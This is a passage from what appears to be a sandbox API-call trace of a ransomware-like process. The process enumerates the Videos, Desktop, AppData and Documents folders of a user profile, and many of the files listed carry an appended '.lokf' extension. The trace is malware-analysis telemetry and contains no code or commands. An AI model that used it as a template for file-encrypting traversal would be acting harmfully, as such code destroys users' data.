ftLastAccessTime.dwLowDateTime=0x208bab90, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x208bab90, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.248] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x208bab90, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x208bab90, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.248] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16c23fe0, ftCreationTime.dwHighDateTime=0x1d4d0c9, ftLastAccessTime.dwLowDateTime=0x6231a9f0, ftLastAccessTime.dwHighDateTime=0x1d4cc57, ftLastWriteTime.dwLowDateTime=0x20848770, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x15c84, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-UhIDPZCm6I2UoJXWw.mkv.lokf", cAlternateFileName="-UHIDP~1.LOK")) returned 1 [0148.248] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-UhIDPZCm6I2UoJXWw.mkv.lokf") returned=".lokf" [0148.248] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8d443130, ftCreationTime.dwHighDateTime=0x1d4cddd, ftLastAccessTime.dwLowDateTime=0x210c35d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x210c35d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="27nF", cAlternateFileName="")) returned 1 [0148.248] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe043560, ftCreationTime.dwHighDateTime=0x1d4cee0, ftLastAccessTime.dwLowDateTime=0x8b63bb70, ftLastAccessTime.dwHighDateTime=0x1d4ccab, ftLastWriteTime.dwLowDateTime=0x2086e8d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x451e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8MMWzVzn.mp4.lokf", cAlternateFileName="8MMWZV~1.LOK")) returned 1 [0148.248] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\8MMWzVzn.mp4.lokf") returned=".lokf" [0148.248] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8b58340, ftCreationTime.dwHighDateTime=0x1d4ca45, ftLastAccessTime.dwLowDateTime=0xd9aec6a0, ftLastAccessTime.dwHighDateTime=0x1d4c5a6, ftLastWriteTime.dwLowDateTime=0x20894a30, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xa335, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9P25HE-ZzsQt.mkv.lokf", cAlternateFileName="9P25HE~1.LOK")) returned 1 [0148.248] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9P25HE-ZzsQt.mkv.lokf") returned=".lokf" [0148.248] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0148.248] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini") returned=".ini" [0148.248] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4372100, ftCreationTime.dwHighDateTime=0x1d4d4e8, ftLastAccessTime.dwLowDateTime=0xe5687140, ftLastAccessTime.dwHighDateTime=0x1d4ce5b, ftLastWriteTime.dwLowDateTime=0x20894a30, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xcf5f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GIpLP30n0FbK.mkv.lokf", cAlternateFileName="GIPLP3~1.LOK")) returned 1 [0148.248] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GIpLP30n0FbK.mkv.lokf") returned=".lokf" [0148.248] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x90f71c0, ftCreationTime.dwHighDateTime=0x1d4c6be, ftLastAccessTime.dwLowDateTime=0x2115bb50, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x2115bb50, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jYsvlZ", cAlternateFileName="")) returned 1 [0148.248] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9df21e80, ftCreationTime.dwHighDateTime=0x1d4cb11, ftLastAccessTime.dwLowDateTime=0x81f3b8c0, ftLastAccessTime.dwHighDateTime=0x1d4ca43, ftLastWriteTime.dwLowDateTime=0x208bab90, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x8ea5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="otAFCyQ0nHxWrUo d.mkv.lokf", cAlternateFileName="OTAFCY~1.LOK")) returned 1 [0148.248] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\otAFCyQ0nHxWrUo d.mkv.lokf") returned=".lokf" [0148.248] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39e19520, ftCreationTime.dwHighDateTime=0x1d4d434, ftLastAccessTime.dwLowDateTime=0xe3df79c0, ftLastAccessTime.dwHighDateTime=0x1d4ce7b, ftLastWriteTime.dwLowDateTime=0x208bab90, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xb166, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XBdxFZI.swf.lokf", cAlternateFileName="XBDXFZ~1.LOK")) returned 1 [0148.249] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XBdxFZI.swf.lokf") returned=".lokf" [0148.249] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39e19520, ftCreationTime.dwHighDateTime=0x1d4d434, ftLastAccessTime.dwLowDateTime=0xe3df79c0, ftLastAccessTime.dwHighDateTime=0x1d4ce7b, ftLastWriteTime.dwLowDateTime=0x208bab90, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xb166, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XBdxFZI.swf.lokf", cAlternateFileName="XBDXFZ~1.LOK")) returned 0 [0148.249] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.249] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.249] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.249] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.249] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.249] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0148.249] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0148.249] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.249] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.249] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.249] PathFindFileNameW (pszPath="") returned="" [0148.249] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.249] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.249] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0148.249] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0148.249] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0148.249] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 0 [0148.249] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.250] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.250] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.250] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.250] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.250] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NxkfKpMd\\") returned="NxkfKpMd\\" [0148.250] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0148.250] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.250] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.250] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.250] PathFindFileNameW (pszPath="") returned="" [0148.250] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NxkfKpMd\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x46ed7210, ftCreationTime.dwHighDateTime=0x1d4d250, ftLastAccessTime.dwLowDateTime=0x20953110, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20953110, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.251] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x46ed7210, ftCreationTime.dwHighDateTime=0x1d4d250, ftLastAccessTime.dwLowDateTime=0x20953110, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20953110, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.251] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ff14610, ftCreationTime.dwHighDateTime=0x1d4d2b5, ftLastAccessTime.dwLowDateTime=0xc3d2ea00, ftLastAccessTime.dwHighDateTime=0x1d4ca24, ftLastWriteTime.dwLowDateTime=0x208e0cf0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x89d9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-Ymy8S 8yhOe9ZasNJRs.flv.lokf", cAlternateFileName="-YMY8S~1.LOK")) returned 1 [0148.251] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NxkfKpMd\\-Ymy8S 8yhOe9ZasNJRs.flv.lokf") returned=".lokf" [0148.251] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6c9db60, ftCreationTime.dwHighDateTime=0x1d4d0df, ftLastAccessTime.dwLowDateTime=0x734ef9c0, ftLastAccessTime.dwHighDateTime=0x1d4c63c, ftLastWriteTime.dwLowDateTime=0x20906e50, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x905, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2qd8JzHjkGInT4Dq.png.lokf", cAlternateFileName="2QD8JZ~1.LOK")) returned 1 [0148.251] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NxkfKpMd\\2qd8JzHjkGInT4Dq.png.lokf") returned=".lokf" [0148.251] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf6856c0, ftCreationTime.dwHighDateTime=0x1d4ca8e, ftLastAccessTime.dwLowDateTime=0x72fe4fd0, ftLastAccessTime.dwHighDateTime=0x1d4c68b, ftLastWriteTime.dwLowDateTime=0x2092cfb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x8d4e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F0_0MMpq eXwaNPyOb.png.lokf", cAlternateFileName="F0_0MM~1.LOK")) returned 1 [0148.251] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NxkfKpMd\\F0_0MMpq eXwaNPyOb.png.lokf") returned=".lokf" [0148.251] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fb2d100, ftCreationTime.dwHighDateTime=0x1d4ccfd, ftLastAccessTime.dwLowDateTime=0x13c954a0, ftLastAccessTime.dwHighDateTime=0x1d4c628, ftLastWriteTime.dwLowDateTime=0x2092cfb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x118be, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gg9DmOuSzgeAHjPyg_oR.mp3.lokf", cAlternateFileName="GG9DMO~1.LOK")) returned 1 [0148.251] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NxkfKpMd\\gg9DmOuSzgeAHjPyg_oR.mp3.lokf") returned=".lokf" [0148.251] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f4137e0, ftCreationTime.dwHighDateTime=0x1d4cd2e, ftLastAccessTime.dwLowDateTime=0x1b446770, ftLastAccessTime.dwHighDateTime=0x1d4c988, ftLastWriteTime.dwLowDateTime=0x20953110, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x7354, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zI78.png.lokf", cAlternateFileName="ZI78PN~1.LOK")) returned 1 [0148.251] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NxkfKpMd\\zI78.png.lokf") returned=".lokf" [0148.251] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f4137e0, ftCreationTime.dwHighDateTime=0x1d4cd2e, ftLastAccessTime.dwLowDateTime=0x1b446770, ftLastAccessTime.dwHighDateTime=0x1d4c988, ftLastWriteTime.dwLowDateTime=0x20953110, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x7354, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zI78.png.lokf", cAlternateFileName="ZI78PN~1.LOK")) returned 0 [0148.251] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.252] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.252] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.252] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\") returned="My Music\\" [0148.252] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0148.252] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.252] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.252] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.252] PathFindFileNameW (pszPath="") returned="" [0148.252] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f4137e0, ftCreationTime.dwHighDateTime=0x1d4cd2e, ftLastAccessTime.dwLowDateTime=0x1b446770, ftLastAccessTime.dwHighDateTime=0x1d4c988, ftLastWriteTime.dwLowDateTime=0x20953110, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x7354, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zI78.png.lokf", cAlternateFileName="ZI78PN~1.LOK")) returned 0xffffffff [0148.252] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.252] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.253] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\") returned="My Pictures\\" [0148.253] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0148.253] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.253] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.253] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.253] PathFindFileNameW (pszPath="") returned="" [0148.253] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f4137e0, ftCreationTime.dwHighDateTime=0x1d4cd2e, ftLastAccessTime.dwLowDateTime=0x1b446770, ftLastAccessTime.dwHighDateTime=0x1d4c988, ftLastWriteTime.dwLowDateTime=0x20953110, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x7354, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zI78.png.lokf", cAlternateFileName="ZI78PN~1.LOK")) returned 0xffffffff [0148.253] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.253] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.253] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="My Shapes\\" [0148.253] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0148.253] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.253] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.253] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.253] PathFindFileNameW (pszPath="") returned="" [0148.253] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x20953110, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20953110, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.253] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x20953110, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20953110, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.253] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0148.253] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini") returned=".ini" [0148.253] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9e9e4460, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9e9e4460, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites.vss.lokf", cAlternateFileName="FAVORI~1.LOK")) returned 1 [0148.254] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss.lokf") returned=".lokf" [0148.254] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x211a7e10, 